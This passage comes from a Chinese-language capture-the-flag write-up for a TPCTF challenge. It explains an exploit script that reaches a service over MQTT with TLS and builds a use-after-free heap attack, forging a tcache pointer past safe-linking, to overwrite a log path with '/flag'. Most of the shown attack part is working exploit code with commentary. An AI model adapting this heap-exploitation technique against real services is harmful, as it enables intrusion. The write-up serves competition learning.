f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]")
pause()
client.subscribe("#")
send_log(client, session_id, "/flag")
if "flag{" in received_messages or "TPCTF{" in received_messages or "tpctf{" in received_messages:
flag = (received_messages)
return flag
return 0
else:
print("No session ID found in received messages.")
# 停止 MQTT 客户端的循环并断开连接
client.loop_stop()
client.disconnect()
if __name__ == "__main__":
main()
接下来我们详细讲一下exp的原理
# 创建 MQTT 客户端实例
client = mqtt.Client(userdata=received_messages)
# 配置 SSL 连接
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)
client.tls_insecure_set(True)
# 设置回调函数
client.on_connect = on_connect
client.on_message = on_message
# 连接到 MQTT Broker
print(f"Connecting to MQTT Broker at {BROKER}:{PORT}...")
client.connect(BROKER, PORT, 60)
# 启动接收消息的循环
client.loop_start()
首先是mqtt服务器的初始化操作,后面都可以直接拿来复用,目的是链接mqtt的broker,初始化接收消息,完成连接等操作的回调函数
# 发送认证 token
send_auth_token(client)
print("\033[33mSent auth token and finger data.\033[0m")
time.sleep(mytime) # 等待消息发送
# 发送有效的指纹数据
send_finger_data(client)
print("\033[33mSent finger data.\033[0m")
time.sleep(mytime) # 等待消息发送
# 获取 session_id,监听接收到的消息
print("Waiting for session_id...")
time.sleep(mytime) # 等待一段时间来接收消息
# 提取 session_id 并根据 session_id 去订阅该 session 的主题
session_id = extract_session_id(received_messages)
然后就是要发送认证token,发送成功之后,获得一个会话,然后如果指纹验证成功,就可以获得该会话的session_id,而正确的指纹数据就是通过前面的爆破exp获得
# 2 add free
send_add(client, session_id,
"[1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
pause()
# uaf 修改fd为自己-8
heap = 0x387898 + offset
xor = (heap - 8) ^ (heap >> 12)
send_edit(client, session_id, 2,
f"[{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]")
pause()
# 申请到自己3
send_add(client, session_id,
"[1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 申请到自己-8,为4
pause()
send_add(client, session_id,
"[0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 此处修改next,为日志路径
log_path = 0x35b1f0 + offset
send_edit(client, session_id, 3, f"[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]")
send_remove_command(client, session_id, 3)
send_remove_command(client, session_id, 1)
tmp1 = 0x39d8e0 + offset
tmp2 = 0x389108 + offset
tmp3 = 0x35b4d8 + offset
tmp4 = 0x399c20 + offset
tmp5 = 0x39a240 + offset
send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]")
这一段就是攻击的核心代码,接下来结合调试进行讲解,建议读者在阅读时逐行下断点调试查看

第一次目的是制造uaf
刚刚malloc完:

被free掉之后:

然后利用edit修改:

由于log字符串对应的伪造堆块,在finger_id偏移处值为0x271,所以下一次edit要设置finger_id为0x271=625,其余值保持不变即可

可以看到此时log字符串已经修改成了/flag

复现成功!
